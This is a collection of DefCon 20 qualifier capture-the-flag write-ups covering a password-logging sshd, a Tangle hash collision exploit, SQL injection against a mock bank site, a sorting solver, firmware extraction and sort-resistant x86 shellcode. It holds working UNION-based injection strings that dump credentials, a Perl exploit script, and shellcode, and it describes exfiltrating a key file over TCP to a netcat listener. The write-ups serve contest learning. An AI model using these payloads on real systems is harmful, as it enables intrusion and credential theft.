DefCon 20 Quals

Thanks to Will (bspar), Dan (macrotis), Ben (strudles) and Joe (selir) for the writeups below


+++++++++++++++++++++++++++++++++++++++++++ Binary 100 +++++++++++++++++++++++++++++++++

Loading the sshd program into IDA and locating the section where
the program writes data to the mac.h file shows a character string
variable (labeled by IDA as abuff) being written to the file. If
you search for where the string is accessed, you find that it is
used by the function auth_password. Inside this function, the
abuff variable gets defined as:
	"pass_from: %s \tuser: %s \tpass: %s\n"

Then, shortly after abuff is defined, there is a loop in the code
that goes through every character in abuff and performs a not
operation on it.  After the not, the program fwrites abuff to the
mac.h file and then calls fclose.
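
Because a bitwise NOT is its own inverse, applying it a second time recovers the original text. A minimal Python sketch of that round trip follows; the function name and the sample values are made up for illustration and are not taken from the binary.

```python
def flip_bits(data: bytes) -> bytes:
    """Return data with every bit of every byte inverted (bitwise NOT)."""
    return bytes(b ^ 0xFF for b in data)

# Format string recovered from auth_password; the filled-in values are invented.
line = "pass_from: %s \tuser: %s \tpass: %s\n" % ("192.0.2.1", "alice", "example")
obfuscated = flip_bits(line.encode("ascii"))    # what would land in mac.h
recovered = flip_bits(obfuscated).decode("ascii")
print(recovered, end="")
```

The same flip_bits call applied to the contents of the real mac.h should give the readable log.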

With this information, it is obvious that the mac.h file contains
bitflips of the string abuff. Performing a bitflip on the mac.h
file that is given in the challenge provides this:

	SSH2_OUT: 192.168.88.61 	user: root 	pass: foobar 	(ddtek.biz)
	SSH2_OUT: 192.168.88.61 	user: root 	pass: f00bar 	(ddtek.biz)
	SSH2_OUT: 192.168.88.61 	user: root 	pass: mypassw0rd 	(ddtek.biz)
	SSH2_OUT: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)
	pass_from: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)
	SSH2_OUT: 192.168.88.151 	user: emily 	pass: l0v3ly
	SSH2_OUT: 192.168.88.151 	user: emily 	pass: w0nd3rful
	SSH2_OUT: 192.168.88.151 	user: emily 	pass: n0pa$$w0rd
	pass_from: 192.168.88.151 	user: emily 	pass: l0v3ly 	(hackeruniversity.edu)
	pass_from: 192.168.88.61 	user: feather 	pass: l1ght3rthand1rt 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: wh@tsmypa$$ 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: justw@it 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: ohmygoD 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: feather 	pass: l1ght3rthand1rt 	(ddtek.biz)
	pass_from: 192.168.88.61 	user: emily 	pass: l0v3ly 	(ddtek.biz)

The key to the challenge was found in the only entry for defcon.org,
with the key being the pass.

	SSH2_OUT: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)
	pass_from: 10.0.2.15 	user: root 	pass: supr3m3p0w3r 	(defcon.org)

In short, the key can be revealed running this and then cat'ing the result.

	python -c 'data = bytearray(open("mac.h", "rb").read()); open("result", "wb").write(bytearray(b ^ 0xff for b in data))'
	
++++++++++++++++++++++++++++++++++++++++++ Binary 200 +++++++++++++++++++++++

Info: Joe solved. It was implementing the Tangle hash.

The binary started off expecting four 4-byte integers as input. Once you got past this 'challenge', it requested another 4-byte integer which was subsequently used as the length for two read()'s. The buffers from these read()'s were passed into some function which returned a value.

The output value from that function was computed for each of the buffers, and if the two values matched, you got the key. The function was rather convoluted, but it contained an array of integers that looked cryptographic, or at least that block was used in operations over the input buffer. A quick search for one of those integers (558a6467) turned up the Tangle hash paper, and sure enough it contained the rest of those integers, which are part of the Tangle hash's initial values.

Since the input to this Tangle function was two buffers and the outputs were checked for equality, the binary is clearly looking for a hash collision. A bit more searching for Tangle collisions turned up a report that linked to a proof-of-concept program called 'untangle', which generates hash collisions. After downloading that code (and the actual Tangle code, which untangle requires), you could run untangle for a given hash length (256 in our case, which is also untangle's default) and get two strings that produce a Tangle collision. Feeding those in as our two buffers made the hash outputs match, and we were given the key.

Here's the exploit code:

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

# connect to the challenge service
my $sock = IO::Socket::INET->new(
        PeerAddr => '140.197.217.155',
        PeerPort => '18703',
        Proto => 'tcp',
) or die "connect failed: $!";

# send 4 required ints
print $sock "\x94\xa4\xc2\x65\xfe\x73\x2d\x6f\xee\xf8\x14\xcb\x6e\xc8\xa1\x26";
# send length of next two buffers
print $sock "\x28\x00\x00\x00";
# send the two strings which Tangle-hash to the same value
print $sock "\xc8\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print $sock "\xc8\x19\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80";

# read the key
while (<$sock>) {
        print $_;
}
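
For reference, the framing the service expects can be sketched in Python. This is only an illustration of the layout described above (16 challenge bytes, a 4-byte little-endian length, then two buffers of that length). The helper name is hypothetical, and the 0x80 offsets in the second buffer are as we read them from the Perl strings, so re-check them against the original before relying on them.

```python
import struct

def build_payload(challenge: bytes, buf_a: bytes, buf_b: bytes) -> bytes:
    """Frame the input: 16 challenge bytes, 4-byte LE length, then both buffers."""
    if len(challenge) != 16:
        raise ValueError("expected four 4-byte integers")
    if len(buf_a) != len(buf_b):
        raise ValueError("both buffers are read with the same length")
    return challenge + struct.pack("<I", len(buf_a)) + buf_a + buf_b

# The four required integers, copied from the Perl exploit.
challenge = bytes.fromhex("94a4c265fe732d6feef814cb6ec8a126")

# Collision pair: both start with c8 19; the second sets 0x80 at a few offsets.
buf_a = bytearray(40)
buf_a[0:2] = b"\xc8\x19"
buf_b = bytearray(buf_a)
for offset in (3, 7, 35, 39):   # assumption: offsets transcribed by eye
    buf_b[offset] = 0x80

payload = build_payload(challenge, bytes(buf_a), bytes(buf_b))
print(len(payload), payload[16:20].hex())
```

The length field comes out as 28 00 00 00, matching the value sent by the Perl script.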

Key: 437f085141d357c5d28850d5119aacb5 


++++++++++++++++++++++++++++++++++++++++++ grab bag 400 +++++++++++++++++++++


Challenge: What is Jeff Moss' checking account balance?

Look around the website real quick, and you notice that the zip code field is injectable. Not only that - error messages are displayed too! How kind :)

The first injection I used to check out the structure of the query:

12345 OR 1=1--

And look, that displays all the branches! That's convenient. Just for sh1ts and giggles, let's build off of that so that we can verify that at least some of the command is working at all times (it should at LEAST display all the branches OR an error). Now let's find out what tables and columns we have...

12345 OR 1=1 UNION SELECT table_name, column_name FROM information_schema.COLUMNS--

Well it looks like the table of branches has more than two columns (duh). So let's account for that:

12345 OR 1=1 UNION SELECT table_name, column_name, NULL, NULL, NULL, NULL FROM information_schema.COLUMNS--

Oh hey! We get a nice juicy listing of tables and columns. This is easy, let's get some login info, that's always fun:

12345 OR 1=1 UNION SELECT firstname, lastname, username, password, NULL, NULL FROM customer--

Aww, Jeff Moss isn't there... But there is another person with the last name Moss, so let's log in as them and see if their balance works. Yep, 0.00 is the flag. It looks like every account has a 0.00 checking account balance, so it really doesn't matter which one was chosen. Well, that was easy.
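
To see why the UNION needed the NULL padding, here is a small self-contained Python sketch. It uses an in-memory SQLite database as a stand-in for whatever the site actually ran, and the table layouts, column names, and sample rows are all hypothetical. Only the shape of the injection strings comes from the steps above.

```python
import sqlite3

def find_branches(conn, zip_code):
    # Deliberately vulnerable: the zip code is pasted straight into the SQL text.
    query = ("SELECT id, name, street, city, state, zip "
             "FROM branches WHERE zip = " + zip_code)
    return conn.execute(query).fetchall()

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE branches (id INTEGER, name TEXT, street TEXT, city TEXT, state TEXT, zip INTEGER);
CREATE TABLE customer (firstname TEXT, lastname TEXT, username TEXT, password TEXT);
INSERT INTO branches VALUES (1, 'Main', '1 First St', 'Las Vegas', 'NV', 89109);
INSERT INTO customer VALUES ('Example', 'User', 'euser', 'hunter2');
""")

normal = find_branches(conn, "12345")               # no branch in that zip
all_rows = find_branches(conn, "12345 OR 1=1--")    # every branch

# A UNION with the wrong number of columns is rejected by the database...
try:
    find_branches(conn, "12345 OR 1=1 UNION SELECT firstname, lastname FROM customer--")
    mismatch_error = None
except sqlite3.OperationalError as exc:
    mismatch_error = str(exc)

# ...so the attacker pads with NULLs until the column counts agree.
leaked = find_branches(
    conn,
    "12345 OR 1=1 UNION SELECT firstname, lastname, username, password, NULL, NULL FROM customer--",
)
print(mismatch_error)
print(leaked)
```

The error message from the mismatched UNION is the kind of feedback that made guessing the column count quick on the real site.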
                                                                     
                                             
++++++++++++++++++++++++++++++++++++++++++ urandom 300 +++++++++++++++++++++

Solved using
- Ruby 1.9.2

Solution:
class IndexedValue
    attr_accessor :idx, :val
    def initialize(i, v)
        self.idx = i
        self.val = v
    end

    def to_s
        "#{idx}: #{val}"
    end
end

class SwapSpec
    attr_accessor :src, :dst
    def initialize(s, d)
        self.src = s
        self.dst = d
    end

    def to_s
        "#{src},#{dst}"
    end
end

def gen_swap_specs(arr)
    working = []
    sorted = []
    ans = []

    arr.each_index do |i|
        working << IndexedValue.new(i, arr[i])
    end

    sorted = working.sort do |a, b| a.val <=> b.val end

    sorted.each_index do |i|
        oldi = sorted[i].idx
        ans << SwapSpec.new(oldi, i)
        working[oldi] = working[i]
        working[oldi].idx = oldi
    end

    return ans
end

...

ans = gen_swap_specs(input)
ans.each do |s|
    sock.print(s.to_s + "\n")
end

Details:
The description of urandom 300 suggested that this was on par with the end-term exam for Stanford's online algorithms course. DDtek being what it is, we can't necessarily assume that much, but one thing is certain: This will be a programming challenge.

Connecting to the given IP address over the given TCP port first prompts you for a password, which itself is given. Inputting the password dumps what appears to be nothing but unprintable binary data, but when we analyzed a capture of the data, there were several lines of instructions giving us the actual details of the challenge.

The binary dump following the instructions was a set of 100,000 16-bit little-endian integers in random order. Our task was to generate a plan for sorting the set using a sufficiently small number of swaps, each on its own line, in under 10 seconds, and report it back to the server. If this task was completed correctly, the server would respond with the key.
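
As a quick illustration of the input format, this is roughly how such a dump decodes in Python. The helper name and the sample bytes are ours; the real data came from the socket.

```python
import struct

def parse_u16_le(blob: bytes) -> list:
    """Decode a byte string into unsigned 16-bit little-endian integers."""
    count = len(blob) // 2          # ignore a trailing odd byte, if any
    return list(struct.unpack("<%dH" % count, blob[:count * 2]))

sample = bytes([0x34, 0x12, 0xFF, 0x00, 0x00, 0x80])
print(parse_u16_le(sample))         # [4660, 255, 32768]
```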

The solution that immediately comes to mind is to modify a sorting algorithm to keep track of all the swaps it makes. But, since we have a hard limit on how many swaps we can actually perform, this eliminates the possibility of using several sorting algorithms (bubble sort, insertion sort, quicksort, they're all out, because they perform too many swaps in their normal operation). The "natural" solution, then, is to use selection sort.

Selection sort works by first scanning the entire set for the minimum value, then placing it at the beginning of the set, and recursing until the entire set has been traversed. This performs, at worst, N swaps for an array of size N, so it's exactly what we're looking for. The code would look something like this:

def gen_swap_specs(arr)
    tmp = arr.clone
    ans = []
    for i in 0..(tmp.length - 1) do
        # find the index of the smallest remaining value
        mindex = i
        for j in i..(tmp.length - 1) do
            if tmp[j] < tmp[mindex] then mindex = j end
        end
        # swap it into place and record the swap
        t = tmp[i]
        tmp[i] = tmp[mindex]
        tmp[mindex] = t
        ans << SwapSpec.new(mindex, i)
    end
    return ans
end

There are only two problems with it, and they're pretty big problems that compound each other: 1. Ruby is slow 2. Selection sort is slow. This algorithm takes 605.6s on a Core i7 2630QM, which is way, way too long to actually solve the challenge, since the set of integers changes on every connection. A better solution was needed to solve this in time.

There was a possibility of solving it in C, and several other teams did end up solving the challenge with selection sort by writing it in C and compiling the code with the most optimizations possible, but I had a better idea that could easily be implemented in Ruby. What if we knew where the integers were going to be /after/ they were sorted, and worked from there?

In order to make this arrangement work, each integer would have to be stored alongside its original index in the array, so when it came time to swap out integers, the source and the destination would be known independent of the actual sorting algorithm, encoded in the position in the given struct. The solution was to introduce a class to do just that:

class IndexedValue
    attr_accessor :idx, :val
    def initialize(i, v)
        self.idx = i
        self.val = v
    end

    def to_s
        "#{idx}: #{val}"
    end
end

There's one more consideration for this, and it's inherent in selection sort: at all times, every index must be valid. So we actually have to swap the elements while running the algorithm, to ensure that any element later on in the sorted set has an index value pointing to its position at that point in the algorithm. So we copy over the given set of integers to another one, each also wrapped with IndexedValues, and initialize a third set as the results of sorting the second set by values. This way, the value originally at the sorted element's new index can be found quickly, and then moved.

Because Ruby arrays hold references to objects, sorting an array only moves references, not the objects themselves. So an array of unsorted IndexedValues shares its entries with the sorted array of IndexedValues: both point at the same objects, and any change to an IndexedValue through one array is visible through the other. This makes for a very, very fast algorithm. How fast? 0.6s on the same Core i7, still in Ruby. Here's the final algorithm, once more:

def gen_swap_specs(arr)
    working = []
    sorted = []
    ans = []

    arr.each_index do |i|
        working << IndexedValue.new(i, arr[i])
    end

    sorted = working.sort do |a, b| a.val <=> b.val end

    sorted.each_index do |i|
        oldi = sorted[i].idx
        ans << SwapSpec.new(oldi, i)
        working[oldi] = working[i]
        working[oldi].idx = oldi
    end

    return ans
end
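
One way to convince yourself that the swap plan is valid is to replay it against the original array. Below is a rough Python port of the routine above plus a replay check. It is a sketch for verification only, not the code used during the quals, and apply_swaps is a helper introduced just for this example.

```python
import random

def gen_swap_specs(values):
    """Return a list of (src, dst) swaps that sorts values, one swap per element."""
    # Each entry is a mutable [current_index, value] pair shared by both lists.
    working = [[i, v] for i, v in enumerate(values)]
    ordered = sorted(working, key=lambda item: item[1])
    swaps = []
    for i, item in enumerate(ordered):
        old = item[0]               # where the i-th smallest value currently sits
        swaps.append((old, i))
        displaced = working[i]      # whatever occupies slot i moves to slot old
        working[old] = displaced
        displaced[0] = old
        working[i] = item
        item[0] = i
    return swaps

def apply_swaps(values, swaps):
    """Replay the swaps on a copy of values and return the result."""
    out = list(values)
    for src, dst in swaps:
        out[src], out[dst] = out[dst], out[src]
    return out

data = [random.randrange(65536) for _ in range(1000)]
plan = gen_swap_specs(data)
print(apply_swaps(data, plan) == sorted(data), len(plan))
```

The plan always contains exactly one swap per element (some of them no-ops where src equals dst), which is what keeps it within the swap budget.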

All that's left is to handle input and output. The "final program" will look a little something like this (thanks to vonr1ch for handling all the socket bugs):

require 'socket'

class IndexedValue
    attr_accessor :idx, :val
    def initialize(i, v)
        self.idx = i
        self.val = v
    end

    def to_s
        "#{idx}: #{val}"
    end
end

class SwapSpec
    attr_accessor :src, :dst
    def initialize(s, d)
        self.src = s
        self.dst = d
    end

    def to_s
        "#{src},#{dst}"
    end
end

def gen_swap_specs(arr)
    working = []
    sorted = []
    ans = []

    arr.each_index do |i|
        working << IndexedValue.new(i, arr[i])
    end

    sorted = working.sort do |a, b| a.val <=> b.val end

    sorted.each_index do |i|
        oldi = sorted[i].idx
        ans << SwapSpec.new(oldi, i)
        working[oldi] = working[i]
        working[oldi].idx = oldi
    end

    return ans
end

def service_interact
    nums = []
    sock = TCPSocket.new("140.197.217.155", 5601)
    sock.recv(10) # recv "Password: "
    sock.write("d0d2ac189db36e15\n")
    start_time = Time.now
    #    sock.close_write
    # Info for the challenge. 100000 uint16_ts coming our way after this.
    sock.recv(504)
    
    # Read all the uint16_ts
    moarnums = ""
    while (moarnums.size < 200000) do
         moarnums << sock.recv(4096)
    end
    nums = moarnums.unpack("v*") # "v" = 16-bit unsigned, little-endian
    
    net_time = Time.now
    puts "Got #{nums.length} uint16_ts in #{net_time - start_time}s"

    begin
        # sort nums        
        ans = gen_swap_specs(nums)
        compute_time = Time.now
        puts "Computed #{ans.length} swaps for #{nums.length} uint16_ts in #{compute_time - net_time}s"
        # send the swap info back
        ans.each do |s|
            sock.print(s.to_s + "\n")
        end
        sock.print("\n")
        send_time = Time.now
        puts "Sent #{ans.length} swaps for #{nums.length} uint16_ts in #{send_time - compute_time}s"
        puts "Spent #{send_time - start_time}s on this job. Key incoming."
        
        # collect the key
        sock.readlines.each do |s|
            puts "Sender replied: " + s
        end
    end
end

service_interact                                     
                                             
+++++++++++++++++++++++++++++++++++++++++++ forensics 300 +++++++++++++++++++++++++++++++

Solved using
- hexdump
- binwalk
- dd
- unsquashfs_lzma (version 4.0, provided by firmware-mod-kit)

Solution:
[macrotis@junebug dlink]$ pwd
$DEFCON_DIR/squashfs-root/home/dlink
[macrotis@junebug dlink]$ cat key.txt
ewe know, the sh33p always preferred Linksys

Details:
Forensics 300 came to us by way of a great big binary dump that "file" could not identify on either Fedora 17 or OS X 10.7. Further investigation was required, so the very first thing I did was look at the data at the beginning.

[macrotis@junebug Defcon 20 Quals]$ hexdump -C f300 | head -n 25
00000000  5e a3 a4 17 00 00 00 20  00 00 00 00 73 69 67 6e  |^...... ....sign|
00000010  61 74 75 72 65 3d 77 72  67 6e 64 30 38 5f 64 6c  |ature=wrgnd08_dl|
00000020  6f 62 5f 64 69 72 38 31  35 00 00 00 5e a3 a4 17  |ob_dir815...^...|
00000030  00 00 00 24 00 38 e0 20  70 e0 30 e2 5e 2a ff 77  |...$.8. p.0.^*.w|
00000040  7e ef 84 66 08 c3 9b 2b  64 65 76 3d 2f 64 65 76  |~..f...+dev=/dev|
00000050  2f 6d 74 64 62 6c 6f 63  6b 2f 32 00 74 79 70 65  |/mtdblock/2.type|
00000060  3d 66 69 72 6d 77 61 72  65 00 00 00 5d 00 00 00  |=firmware...]...|
00000070  02 b4 e7 2d 00 00 00 00  00 00 4e 03 fc 00 8c 66  |...-......N....f|
00000080  f8 58 2f a1 b8 d4 a5 bf  31 9b 56 ad 7e 8f ad 62  |.X/.....1.V.~..b|
00000090  75 bc 8a 42 ed 6b c3 47  84 61 d9 f2 5f af e5 df  |u..B.k.G.a.._...|
000000a0  ce d2 7e a8 e9 d4 8f 3b  de 6e 4d 43 df 78 ef 0c  |..~....;.nMC.x..|
000000b0  72 ef 0a 14 af b4 bf 53  11 17 53 fc 9a 46 e4 08  |r......S..S..F..|
000000c0  f8 3b b0 95 22 92 00 d0  9f 30 59 dc 33 e7 9e 75  |.;.."....0Y.3..u|
000000d0  71 be e4 4a 77 81 ea 9e  0b e7 9f e4 2b fc da 05  |q..Jw.......+...|
000000e0  aa 94 7b 20 10 33 3d d9  8f 8b 46 23 c9 fc f2 72  |..{ .3=...F#...r|
000000f0  da a7 5a 95 ae 58 43 ca  a4 5e fb 0b bd 7f c9 01  |..Z..XC..^......|
00000100  01 16 c7 18 92 ec ac a4  d6 55 11 6a 94 f7 db 9d  |.........U.j....|
00000110  ec 62 25 54 53 d4 3b ae  98 31 e7 4c 61 26 a4 32  |.b%TS.;..1.La&.2|
00000120  56 17 18 72 fe f1 9e 8b  6e ee 06 e5 f4 fa 8f e8  |V..r....n.......|
00000130  ed a9 33 cd 70 bc cc 09  7b ac 63 00 6e 36 d6 0c  |..3.p...{.c.n6..|
00000140  54 02 e1 8a c4 75 b8 9f  6c 32 aa 8a b0 a9 ad 45  |T....u..l2.....E|
00000150  af 92 46 fd c7 6e 20 86  bc ad e4 dd b2 79 3b 0d  |..F..n ......y;.|
00000160  75 94 ef b7 8e 60 0f c5  e8 13 ae ae 99 ba 3d d3  |u....`........=.|
00000170  fb 4c c4 47 3d c9 bb 2d  71 71 ea aa b7 d2 48 51  |.L.G=..-qq....HQ|
00000180  f9 26 89 c4 5f d8 6f da  a8 fb 42 bd f9 a1 77 90  |.&.._.o...B...w.|

Hmm. signature=wrgnd08_dlob_dir815? dev=/dev/mtdblock/2? type=firmware? Looks an awful lot like router firmware to me, and I'm guessing D-Link. A quick search of the "dev" string lands me on this OpenWRT page: http://wiki.openwrt.org/toh/d-link/dir-645. Unfortunately, the tools I need to extract this image are apparently only generated when you compile OpenWRT, and I didn't want to do that. So I went and searched for leads on D-Link's proprietary firmware format, SEAMA, and came up empty-handed. A more general search led me to the firmware-mod-kit package, available at code.google.com/p/firmware-mod-kit/.

Unfortunately, using the tools documented immediately in the package would not work at all on the file. Some leads indicated that SEAMA had a SquashFS image in the file somewhere, and the real trick would be getting that out.

More research led me to a tool called "binwalk", available at https://code.google.com/p/binwalk/. Binwalk is a lot like scalpel, except it doesn't support many formats and it doesn't actually extract anything. Running binwalk on the file gave an offset of what appeared to be a SquashFS filesystem. All I had to do was extract it.

[macrotis@junebug Defcon 20 Quals]$ binwalk f300

DECIMAL   	HEX       	DESCRIPTION
-------------------------------------------------------------------------------------------------------
108       	0x6C      	LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3008436 bytes
983148    	0xF006C   	PackImg Tag, little endian size: 14690560 bytes; big endian size: 2744320 bytes
983180    	0xF008C   	Squashfs filesystem, little endian, version 4.0, size: 724610815 bytes, 1470 inodes, blocksize: 0 bytes, created: Sat Mar  6 06:29:04 1993

[macrotis@junebug Defcon 20 Quals]$ dd if=f300 of=f300_dump bs=1 count=724610815 skip=983180
3842188+0 records in
3842188+0 records out
3842188 bytes (3.8 MB) copied, 3.0306 s, 1.3 MB/s
[macrotis@junebug Defcon 20 Quals]$ file f300_dump
f300_dump: Squashfs filesystem, little endian, version 4.0, 2857099 bytes, 1470 inodes, blocksize: 131072 bytes, created: Wed May 30 17:26:52 2012
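
The dd step amounts to copying everything from the reported offset to the end of the file. A small Python sketch of the same idea is below. It runs on a synthetic stand-in rather than the real image, and the helper names are ours. The "hsqs" magic is the little-endian SquashFS signature.

```python
SQUASHFS_MAGIC = b"hsqs"  # little-endian SquashFS superblock magic

def find_squashfs(blob: bytes) -> int:
    """Return the offset of the first SquashFS magic, or -1 if absent."""
    return blob.find(SQUASHFS_MAGIC)

def carve_from(blob: bytes, offset: int) -> bytes:
    """Return everything from offset to the end, like dd with skip=offset."""
    return blob[offset:]

# Synthetic stand-in for the firmware: a fake header, then a fake filesystem.
image = b"\x5e\xa3\xa4\x17" + b"\x00" * 60 + SQUASHFS_MAGIC + b"payload"
offset = find_squashfs(image)
carved = carve_from(image, offset)
print(offset, carved[:4])
```

For the real file you would read f300 in binary mode and use the offset binwalk reported (983180). Slicing in memory also avoids the slow byte-at-a-time copy that bs=1 causes.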

The resulting file was, indeed, a SquashFS filesystem, supposedly version 4.0. Alas, the unsquashfs shipped with Fedora wouldn't work.

[macrotis@junebug Defcon 20 Quals]$ unsquashfs f300_dump
Parallel unsquashfs: Using 2 processors
lzma uncompress failed with error code 9
read_block: failed to read block @0x2b8d25
read_fragment_table: failed to read fragment table index
FATAL ERROR aborting: failed to read fragment table

In addition to using a proprietary firmware container, D-Link /also/ uses a proprietary variant of SquashFS. Modern versions can support lzma just fine, but D-Link is using a variant that the standard tools can't understand. So, what was I to do?

As it turns out, firmware-mod-kit provided the solution at $SRCDIR/trunk/trunk/src/others/squashfs-4.0-lzma/, the unsquashfs_lzma binary. Using it successfully extracted the filesystem for further analysis.

[macrotis@junebug Defcon 20 Quals]$ ~/Projects/firmware-mod-kit-read-only/trunk/trunk/src/others/squashfs-4.0-lzma/unsquashfs_lzma f300_dump
Parallel unsquashfs: Using 2 processors
1376 inodes (1415 blocks) to write

[=|                                                            ]   46/1415   3%
create_inode: could not create character device squashfs-root/dev/console, because you're not superuser!
[=|                                                            ]   46/1415   3%
create_inode: could not create character device squashfs-root/dev/cua/0, because you're not superuser!
...
create_inode: could not create character device squashfs-root/dev/zero, because you're not superuser!
[==========================================================\   ] 1349/1415  95%
created 1166 files
created 94 directories
created 144 symlinks
created 0 devices
created 0 fifos
[macrotis@junebug Defcon 20 Quals]$ ls squashfs-root/
bin  dev  etc  home  htdocs  lib  mnt  proc  sbin  sys  tmp  usr  var  www
[macrotis@junebug Defcon 20 Quals]$

The actual key was in a somewhat obvious place, home/dlink/key.txt, and the contents read "ewe know, the sh33p always preferred Linksys" (thanks to hi117 for finding the key quickly when given a usable filesystem).

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Pwn 300 +++++++++++++++++++++++++++++++++++++++++

Pwn300 is a fairly small binary with a mean streak. It starts off like many of the other binaries in these quals by needing to be fed a specific string (3c56bc31268ac65f in this case) before it will allow you to proceed to the real challenge. Next, it reads in up to 0x400 bytes of data, zeroes out whatever part of that 0x400-byte buffer you didn't use, calls the function sub_08048a00, and then conveniently calls your buffer. So, it can't get much simpler. Feed in your shellcode and pwn300 will run it for you.

However, the problem is what's done to your buffer by sub_08048a00. This nasty little function treats your buffer as an array of 4-byte integers and then recursively sorts them into increasing numeric order. So, the trick is to write custom shellcode which when sorted still ends up being in the same order you originally coded. This is basically an exercise in learning x86 opcodes and creative ways to accomplish your task using carefully chosen operations.

As the shellcode gets longer, it is increasingly difficult to write something useful that will end up in sorted order. So, you want to write very compact code. One way to do this is to implement a simple read() syscall that will read the rest of your shellcode onto the stack and jump to it. The read() syscall is fairly straightforward on BSD. You need the following items pushed onto the stack: the read syscall number (3), the file descriptor to read from (your socket, which is often FD 4 for simple CTF programs), the buffer address you'd like to read into, and the number of bytes to read.

So, your shellcode might look like:

BITS 32
push 0x7f       ; read up to 127 bytes
push 0xbfbfe900 ; or some other known memory addr on the stack
push 0x4        ; file descriptor 4
push 0x3        ; syscall number for sys_read under bsd
int 0x80
mov eax, 0xbfbfe900
call eax

If you assemble the above (nasm -o shellcode shellcode.asm), you get (shown as 4-byte chunks for ease of sorting):

687f0000
006800e9
bfbf6804
00000068
03000000
cd80b800
e9bfbfff
d0000000

Obviously if you sort that, you're not going to end up with the same code (remember we're talking about little endian here, so the high-order bits are on the right). So, cozy up to the x86 Instruction Set Reference and see if you can write yourself some shellcode that will allow you to implement this read. You also might want to check out this rather old opcode map, which makes it somewhat easier to find simple instructions and figure out their opcode values so that you can pick ones which sort well.

As a hint, think about convenient ways to perform nop's. Obviously, there's the normal 0x90. But, that's a pretty high number. So if you use that as the high-order byte of one of your 4-byte words, it ties your hands a bit for any subsequent words. Perhaps there are other instructions which are lower numbers, but which don't hurt anything in your shellcode if you use them? Maybe some single-byte opcodes??? It took me 28 bytes of total shellcode to implement my read. It can probably be done better. So, try it out yourself.

Here's the assembly I ended up using:

BITS 32
xor eax,eax            ; zero out eax
inc eax                ; take advantage of the low number 'inc eax' opcode as filler
inc eax                ; same
sub esp, byte 0x7f     ; move the stack pointer up a bit to give us some room for our new shellcode
inc eax                ; again, use low number opcode as filler
push byte 0x7f         ; push the number of bytes to read() onto the stack
nop                    ; nop for filler
inc eax                ; now eax=4 (our file descriptor)
push esp               ; push the addr where read() will put its data 
push eax               ; push the file descriptor
dec eax                ; decrement eax back to 3 for the syscall number
push eax               ; push the syscall number onto the stack
int 0x80               ; do the syscall
pop eax                ; pop our way back to the stack addr we pushed earlier
pop eax
pop eax                ; now eax contains the addr of our shellcode
inc eax                ; increment eax to get past some garbage that was left on the stack
nop
inc eax                ; more garbage
call eax               ; call eax to run your newly read in code

This looks unnecessarily complicated. But each instruction was carefully chosen so that the resulting machine code would be sorted into ascending order. For example, the “inc eax” (\x40) instructions had a nice low opcode so they made great high-order byte values for the first few words. This is the resulting machine code:

\x31\xc0\x40\x40
\x83\xec\x7f\x40
\x6a\x7f\x90\x40
\xff\xf4\x50\x48
\x50\xcd\x80\x58
\x58\x58\x40\x90
\x40\xff\xd0\xff

Interestingly, I ended up coding this by hand rather than using nasm, and because of that I used “ff f4” for “push esp” rather than the shorter “54” opcode. So, if you use nasm to assemble the above code, your resulting machine code will likely be slightly different. Also, note that the final \xff on the end of the last word really isn't part of the assembled shellcode. When the shellcode runs, the “call eax” (\xff\xd0) instruction will never return, so it doesn't matter what we put into that final byte, and I needed it to sort to the last word in the list, so I chose 0xff.

As you can see, the 4-byte words are in sorted order, so the order won't be changed by the sorting function. Once this shellcode is executed, it will read up to an additional 0x7f bytes onto the stack and then call that code. The additional 0x7f bytes I sent simply opened the “key” file, opened a TCP connection back to my machine (where netcat was listening), and wrote the contents of that key file to that TCP connection.
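
Checking candidate shellcode by hand gets tedious, so a short script helps. The Python sketch below treats the code as little-endian 32-bit words and tests whether sorting would leave them in place. It assumes the binary compares the words as unsigned integers, which we have not confirmed from the disassembly here, and the function names are ours.

```python
import struct

def words_le(code: bytes) -> list:
    """Split code into unsigned 32-bit little-endian words."""
    if len(code) % 4:
        raise ValueError("pad the code to a multiple of 4 bytes first")
    return list(struct.unpack("<%dI" % (len(code) // 4), code))

def survives_sort(code: bytes) -> bool:
    """True if sorting the words in increasing order leaves them unchanged."""
    words = words_le(code)
    return words == sorted(words)   # assumption: unsigned comparison

# The naive read() shellcode and the hand-tuned version from above.
naive = bytes.fromhex("687f0000 006800e9 bfbf6804 00000068 "
                      "03000000 cd80b800 e9bfbfff d0000000")
final = bytes.fromhex("31c04040 83ec7f40 6a7f9040 fff45048 "
                      "50cd8058 58584090 40ffd0ff")
print(survives_sort(naive), survives_sort(final))   # False True
```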

Key: ddc148610e2c74ac10106e0f35f45416a67bacbb